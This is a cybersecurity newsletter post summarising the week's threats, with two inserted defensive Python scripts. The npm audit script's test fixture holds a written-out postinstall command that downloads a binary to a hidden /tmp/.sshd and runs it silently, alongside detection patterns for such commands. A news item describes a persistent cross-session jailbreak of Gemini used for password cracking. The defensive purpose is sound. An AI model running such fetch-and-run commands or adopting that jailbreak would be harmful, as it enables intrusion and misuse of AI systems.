CISO Talk by James Azar
CyberHub Podcast
Lazarus Deploys RemotePE Memory-Only RAT Against Banks and Crypto Firms Leaving Zero Disk Artifacts, Canadian Man Arrested for Operating KimWolf DDoS Botnet, FBI Warns of Kali365 PhaaS
Ubiquiti Three CVSS 10.0 UniFi Flaws with 100K Exposed Endpoints, FBI Kali365 Phishing Kit Bypasses M365 MFA, Lazarus RemotePE Fileless RAT, Russian Actor Weaponizes Jailbroken Gemini, US Drops $2B

☕ Good Morning Security Gang,

I hope everyone had a meaningful Memorial Day weekend.

Yesterday was one of those days that reminds you how much we take for granted. Watching children talk about fathers they lost in service to this country hits differently when you become a parent yourself. Memorial Day isn’t one day of grief for those families—it’s 365 days a year. So wherever you pray, however you reflect, remember the families carrying that sacrifice every single day and honor them not just yesterday, but all year long.

Now, while many people were off enjoying the holiday, the threat landscape absolutely was not. Today’s show is packed:

  • Ubiquiti dropped emergency patches for three CVSS 10 vulnerabilities

  • The FBI warned about a new Microsoft 365 MFA bypass phishing platform

  • Lazarus deployed a fully fileless in-memory RAT targeting finance and crypto firms

  • DPRK malware campaigns evolved to compiled binaries to evade detection

  • A Russian threat actor weaponized a jailbroken Gemini AI

  • npm packages hid Linux backdoors disguised as SSH daemons

  • Europol and Canadian authorities scored major takedowns

  • And the U.S. government just dropped $2 billion into quantum computing acceleration

Double espresso in hand. Coffee cup cheers, gang. Let’s get into it.

🧭 Executive Summary

Today’s threat landscape paints a very clear picture of where cybersecurity stands in 2026: attackers are becoming dramatically faster, stealthier, and more automated than most defensive operations are prepared for. Nation-state actors are deploying memory-only malware invisible to traditional endpoint tools, phishing-as-a-service kits are bypassing MFA without stealing passwords, and AI platforms are now actively participating in intrusion workflows.

At the same time, governments and law enforcement are escalating responses through coordinated takedowns, infrastructure seizures, and quantum computing investments. The cybersecurity battle is no longer just about malware versus antivirus; it is now about operational speed, cryptographic survival timelines, AI-assisted offense, and the future trust model of the internet itself.

📰 Top Stories & Deep Dive Analysis

“Today’s stories read as one coherent threat picture: the attackers are faster, cheaper, and harder to detect than they were twelve months ago. CVSS perfect ten in Ubiquiti. MFA bypassed by a two hundred and fifty dollar subscription service. A North Korean RAT that lives purely in memory. An AI that jailbreaks itself and cracks passwords for a low-skilled Russian actor. These are not theoretical risks anymore; they are Tuesday morning’s operational realities.” – James Azar

🚨 Ubiquiti Drops Emergency Patch for Three CVSS 10 UniFi Vulnerabilities

Ubiquiti issued emergency patches for five UniFi OS vulnerabilities, including three carrying the maximum possible CVSS score of 10.0. The flaws include:

  • Improper access control allowing unauthorized changes

  • Path traversal enabling arbitrary file reads

  • Command injection enabling full remote code execution without requiring credentials

Researchers are currently tracking approximately 100,000 internet-exposed UniFi OS endpoints globally, with nearly half located in the United States alone.

The alarming part here is not just the severity; it’s the simplicity. These are low-complexity exploits requiring no privileges and minimal attacker effort. If organizations have exposed UniFi management interfaces directly to the internet, attackers only need the IP address to begin exploitation.

Even though Ubiquiti has not publicly confirmed active exploitation yet, history tells us threat actors are almost certainly already testing and weaponizing these vulnerabilities in parallel with disclosure.

Security teams should patch immediately and move all UniFi management interfaces behind VPNs or isolated management VLANs. Internet-exposed management infrastructure continues to be one of the fastest-growing breach vectors across the industry.

🎣 FBI Warns of “Kali365” MFA Bypass Phishing Platform

The FBI issued an IC3 warning about “Kali365,” a phishing-as-a-service platform specifically designed to bypass Microsoft 365 MFA using OAuth device authorization flows.

This is what makes the platform dangerous:
👉 It does not steal passwords.

Instead, it abuses Microsoft’s legitimate device code authentication process originally designed for smart TVs, printers, and IoT devices. Victims receive legitimate-looking Microsoft login prompts and authenticate normally. MFA fires successfully. Nothing appears suspicious to the user.

Meanwhile, the attacker captures the live authentication token and immediately gains full account access.

The platform reportedly includes:

  • AI-generated phishing lures

  • Real-time victim dashboards

  • Automated token capture

  • Telegram-based operator infrastructure

Hundreds of attacks have already targeted manufacturing, healthcare, education, government, insurance, and financial sectors across North America and Europe.

This is a perfect example of attackers abusing trusted authentication workflows instead of breaking them directly. Organizations should immediately restrict or disable device code authentication flows through Microsoft Entra conditional access policies where operationally feasible.
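Two checks a defender would want after reading this, as an added example that is not part of the original post: hunt exported Entra sign-in records for successful device code authentications (which look like normal, MFA-satisfied logins until you look at the protocol field), and verify that an exported Conditional Access policy actually blocks the flow. The record and policy shapes follow the Microsoft Graph signIn and conditionalAccessPolicy resources as I understand them, and all sample data is constructed.

```python
import json
from collections import defaultdict

# Constructed sample export (JSON Lines). Field names follow the Microsoft Graph
# signIn resource (assumed here); adjust them if your export differs.
SAMPLE_EXPORT = """\
{"createdDateTime":"2026-05-26T08:01:12Z","userPrincipalName":"alice@example.com","appDisplayName":"Microsoft Office","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.10","status":{"errorCode":0}}
{"createdDateTime":"2026-05-26T08:04:40Z","userPrincipalName":"alice@example.com","appDisplayName":"Microsoft Office","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.10","status":{"errorCode":0}}
{"createdDateTime":"2026-05-26T08:05:02Z","userPrincipalName":"bob@example.com","appDisplayName":"Microsoft Teams","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.7","status":{"errorCode":50126}}
{"createdDateTime":"2026-05-26T09:15:55Z","userPrincipalName":"carol@example.com","appDisplayName":"Outlook","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.44","status":{"errorCode":0}}
"""

def parse_signins(text):
    """Parse one JSON sign-in record per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def device_code_signins(records):
    """Return successful device code sign-ins, flagging the first one seen per user."""
    seen = defaultdict(set)  # user -> authentication protocols already observed
    hits = []
    for r in sorted(records, key=lambda r: r["createdDateTime"]):
        upn, proto = r["userPrincipalName"], r.get("authenticationProtocol")
        if proto == "deviceCode" and r.get("status", {}).get("errorCode", -1) == 0:
            # Password and MFA both succeeded; only the protocol gives this away.
            hits.append({"time": r["createdDateTime"], "user": upn,
                         "app": r.get("appDisplayName"), "ip": r.get("ipAddress"),
                         "first_device_code_for_user": "deviceCode" not in seen[upn]})
        seen[upn].add(proto)
    return hits

# Constructed Conditional Access policy (Graph conditionalAccessPolicy shape, assumed)
# that blocks the device code flow for all users and cloud apps.
SAMPLE_POLICY = {
    "displayName": "Block device code flow", "state": "enabled",
    "conditions": {"users": {"includeUsers": ["All"]},
                   "applications": {"includeApplications": ["All"]},
                   "authenticationFlows": {"transferMethods": "deviceCodeFlow"}},
    "grantControls": {"operator": "OR", "builtInControls": ["block"]},
}

def policy_blocks_device_code(policy):
    """True if an enabled policy targets the device code flow with a block grant."""
    flows = policy.get("conditions", {}).get("authenticationFlows", {})
    methods = [m.strip() for m in flows.get("transferMethods", "").split(",")]
    blocks = "block" in policy.get("grantControls", {}).get("builtInControls", [])
    return policy.get("state") == "enabled" and "deviceCodeFlow" in methods and blocks

if __name__ == "__main__":
    print(*device_code_signins(parse_signins(SAMPLE_EXPORT)), sep="\n")
```

A user whose first-ever device code sign-in appears during a phishing wave is the record to pull first; where the flow cannot be blocked outright, scope the policy to exclude only the service accounts that genuinely need it.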

👻 Lazarus Deploys “RemotePE” Fileless RAT

North Korea’s Lazarus Group deployed a new fileless remote access Trojan called “RemotePE,” specifically targeting cryptocurrency and financial organizations.

What makes this malware especially dangerous is that it:

  • Executes entirely in memory

  • Never writes payloads to disk

  • Uses Windows DPAPI tied to the victim environment

  • Dynamically loads additional DLL capabilities post-compromise

Traditional file-hash-based detection becomes almost useless in this model because there are no persistent files to scan.

Initial access relies heavily on social engineering via Telegram, fake trading firms, cloned Calendly domains, and fraudulent meeting invitations targeting developers and analysts.

This is another evolution in the DPRK operational model:
👉 Memory-only malware designed specifically to evade traditional EDR visibility while targeting financial ecosystems directly.

Organizations relying heavily on static file scanning without runtime memory analysis should consider this a major visibility gap.

💻 InvisibleFerret Malware Evolves Into Compiled Binary Format

A related DPRK campaign tied to the Void Dokkaebi cluster upgraded its “InvisibleFerret” malware from readable Python scripts into compiled Cython binaries designed to evade antivirus and EDR detection.

The malware still performs:

  • Browser credential theft

  • Clipboard monitoring

  • Keylogging

  • Crypto wallet targeting

  • Backdoor access

But by compiling the malware into native-looking binaries (.pyd and .so files), attackers bypass many detections previously focused on Python scripts.

Distribution continues through fake developer interview lures where candidates download “technical assessment packages” that silently install the malware.

This continues to reinforce a critical trend:
👉 Developers themselves are now among the highest-priority targets for nation-state operations.

🤖 Russian Threat Actor Weaponizes Jailbroken Gemini AI

One of the most fascinating stories today involved a Russian-speaking operator known as “BenCamPro,” who weaponized a jailbroken instance of Google Gemini CLI during a multi-year campaign involving WordPress compromises, credential cracking, crypto theft, and influence operations.

Using stolen Gemini API keys, the operator built a self-reinforcing jailbreak system where Gemini retained prior jailbreak instructions across sessions. The AI was then used to:

  • Generate password mutations

  • Crack WordPress admin accounts

  • Analyze stolen InfoStealer logs

  • Assist operational decision-making

Researchers linked the activity to:

  • 29 compromised WordPress admin accounts

  • MAGA-themed influence operations

  • Crypto wallet theft campaigns

  • Telegram channels with over 17,000 subscribers

This is the clearest evidence yet that AI is now materially lowering the skill barrier for cybercrime operations.

AI isn’t just accelerating defenders anymore; it’s becoming operational infrastructure for attackers as well.

📦 npm Supply Chain Campaign Hides Linux Backdoor as SSH Daemon

Researchers uncovered an npm-based supply chain campaign hiding a Linux backdoor disguised as a fake SSH daemon named .sshd inside /tmp.

The malware used malicious postinstall scripts inside package.json files to:

  • Download binaries from attacker-controlled GitHub releases

  • Install them silently in background processes

  • Suppress errors and detection visibility

The naming convention was deliberate:
👉 During incident response, /tmp/.sshd may appear benign at first glance.

The campaign primarily targeted mixed PHP and JavaScript monorepo environments where npm lifecycle scripts execute automatically during builds.

This continues the now-familiar attacker playbook:

  • Poison dependencies

  • Exploit CI/CD trust

  • Persist quietly

  • Steal credentials

Organizations should aggressively review npm lifecycle scripts before deployment and monitor for suspicious SSH-like processes running from temporary directories.
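The review step recommended above, as an added example that is not part of the original post or of the campaign reporting: it audits package.json lifecycle hooks for the fetch, drop into a hidden /tmp path, background and silence pattern described here, and can walk an installed node_modules tree. The pattern set, the sample manifests and the EXAMPLE-ORG release URL are all constructed.

```python
import json
import os
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns a reviewer would want surfaced: remote fetches, temp-dir drops,
# hidden file names, background launches and output suppression.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|https?://", re.I),
    "temp_dir_drop": re.compile(r"/tmp/|\$TMPDIR|/dev/shm/"),
    "hidden_file": re.compile(r"/\.[A-Za-z0-9_-]+\b"),
    "backgrounded": re.compile(r"&\s*(\)|$)|\bnohup\b|\bsetsid\b"),
    "silenced": re.compile(r">/dev/null|\|\|\s*true\b"),
}

def audit_manifest(name, manifest_json):
    """Return one finding per lifecycle hook whose command matches a pattern."""
    findings = []
    scripts = json.loads(manifest_json).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        tags = [tag for tag, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if tags:
            findings.append({"package": name, "hook": hook, "tags": tags, "command": cmd})
    return findings

def audit_tree(root):
    """Walk an installed node_modules tree and audit every package.json in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if "package.json" in files:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                findings += audit_manifest(os.path.relpath(dirpath, root), fh.read())
    return findings

# Constructed manifests: a benign native build step, and one mirroring the
# fetch, drop to /tmp/.sshd, background, silence pattern described above.
BENIGN = json.dumps({"name": "fast-hash", "scripts": {"install": "node-gyp rebuild"}})
MALICIOUS = json.dumps({"name": "ui-helpers", "scripts": {"postinstall":
    "curl -fsSL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/agent "
    "-o /tmp/.sshd && chmod +x /tmp/.sshd && (/tmp/.sshd >/dev/null 2>&1 &) || true"}})

if __name__ == "__main__":
    for finding in audit_manifest("ui-helpers", MALICIOUS) + audit_tree("node_modules"):
        print(finding)
```

Run it against the lockfile-resolved tree in CI before any build step executes, and pair it with `npm ci --ignore-scripts` where native builds are not needed so lifecycle hooks never run unreviewed.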

⚖️ KimWolf Botnet Operator Arrested in Canada

Canadian authorities arrested 23-year-old Jacob Butler, allegedly the operator behind the KimWolf DDoS-for-hire botnet responsible for attacks exceeding 30 terabits per second.

The botnet reportedly infected over one million devices globally and caused losses exceeding $1 million for individual victims.

The investigation relied heavily on:

  • IP address correlation

  • Financial transaction tracing

  • Messaging platform analysis

  • Infrastructure linkage

The case is another reminder that cyber attribution and operational takedowns are becoming increasingly sophisticated globally.

🇪🇺 Europol Operation Saffron Dismantles VPN Used by 25 Ransomware Groups

Europol’s Operation Saffron seized 33 servers tied to “FirstVPN,” a service allegedly used by more than 25 ransomware groups for anonymization infrastructure.

Authorities arrested the alleged Ukrainian administrator and shared over 500 user profiles with international law enforcement partners.

This operation demonstrates growing coordination between:

  • Europol

  • FBI

  • International cybercrime task forces

The global law enforcement ecosystem is increasingly functioning as a coordinated operational network rather than isolated national efforts.

⚛️ U.S. Government Commits $2 Billion to Quantum Computing

The Trump administration announced approximately $2 billion in grants to accelerate quantum computing development, with IBM expected to receive nearly half the funding.

“Quantum isn’t a theoretical risk. It’s a countdown clock.”

The move significantly sharpens concerns around “Q-Day”:
👉 The moment quantum systems can reliably break RSA and elliptic curve cryptography.

Researchers now estimate cryptographically relevant quantum capabilities could emerge as early as:

  • 2027

  • 2028

  • Or by 2030 depending on acceleration models

The implications are enormous:

  • Banking infrastructure

  • Military communications

  • TLS encryption

  • Cryptocurrencies

  • VPNs

  • Secure messaging

All rely heavily on cryptographic systems vulnerable to future quantum attacks.

NIST finalized post-quantum cryptographic standards last year, but many organizations still have not begun crypto-agility migration planning.

That timeline is shrinking rapidly.

🎯 Key Takeaway

👉 Attackers are increasingly operating at machine speed while defenders are still relying on human-speed processes.

🛠️ Action Items for Security Leaders

  • 🚨 Patch UniFi OS immediately and remove management interfaces from public internet exposure

  • 🎣 Restrict Microsoft device code authentication through conditional access policies

  • 👻 Deploy runtime memory analysis capabilities beyond file-hash detection

  • 💻 Brief developer teams on DPRK fake interview campaigns

  • 🤖 Audit AI API key exposure across CI/CD environments and repositories

  • 📦 Review npm lifecycle scripts before deployment into production pipelines

  • ⚖️ Monitor law enforcement intelligence releases tied to ransomware infrastructure

  • 🇪🇺 Review VPN and anonymization service usage within enterprise environments

  • ⚛️ Begin crypto-agility inventory and post-quantum cryptography migration planning

  • 🔍 Treat AI infrastructure and developer ecosystems as critical operational attack surfaces


🧠 James Azar’s CISOs Take

What stood out to me today is how clearly the operational gap between attackers and defenders is widening. Fileless malware, MFA bypasses using legitimate Microsoft flows, AI-assisted password cracking, and supply chain backdoors all point to one reality: attackers are optimizing around trust and automation faster than most organizations can adapt. Traditional reactive security models are struggling to keep pace with machine-speed attack operations.

The second major takeaway is that quantum computing is no longer a distant research topic; it’s now a boardroom issue. The U.S. government doesn’t invest $2 billion into quantum acceleration unless it believes the strategic race is already underway. Organizations still treating post-quantum cryptography as “future planning” are likely underestimating how quickly this timeline is compressing. Crypto agility needs to become a strategic initiative now, not after the first major quantum breakthrough hits headlines.

🔥 Stay Cyber Safe.
